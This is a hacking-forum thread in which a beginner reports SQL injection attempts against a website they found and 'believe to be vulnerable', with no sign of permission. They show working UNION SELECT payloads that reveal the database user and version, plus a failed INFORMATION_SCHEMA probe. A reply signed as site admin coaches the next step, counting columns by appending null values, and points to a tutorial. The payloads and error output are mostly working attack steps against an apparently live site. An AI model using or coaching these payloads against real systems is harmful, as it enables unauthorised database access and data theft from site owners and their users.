Welcome to the forums! A chance for site members to chat and get help.
You are not logged in.
Pages: 1
Ok I am fairly new at sql injection and hacking in general. I have found a website that I believe to be vulnerable, but still having some issues, so far this is what I have found;
news.php3?id=-1'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1''' at line 1: 1064
news.php3?id=-1' UNION/**/ALL/**/SELECT/**/1,user()/*root@localhost
news.php3?id=-1' UNION/**/ALL/**/SELECT/**/1,version()/*4.1.20
So I have figured out that its possibly vulnerable and the version its running and the root directory, but I was unsure where to go after that. I read over the tutorial on this website about sql injection and found then tried the follow;
news.php3?id=-1' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='users') AND ''='Access denied for user 'host'@'localhost' to database 'INFORMATION_SCHEMA': 1044
If I understood the tutorial correct that command is to attempt to figure out the databases name. So naturally I tried and changed the name of the database and keep receive the same error. Is this because I am just not getting the name right or is that error indicating something else?
Offline
damn, it looks like the information schema is blocked, that always makes things harder. You seem to know quite a lot about SQL already. SQL injections are usually all about guess work. You can start by getting the number of table columns. start with<br /><br />
news.php3?id=-1' UNION ALL SELECT null --<br /><br />then keep adding nulls, e.g. <br /><br />
news.php3?id=-1' UNION ALL SELECT null,null --<br /><br />until you get an error message. when you get the error you know the previous was the number of columns the table has. then we can look at using wildcards (% symbols.) I am not a complete expert in this field but i can try. <br /><br />ps also check out tutorial #18 on this site.
Site admin
Offline
Pages: 1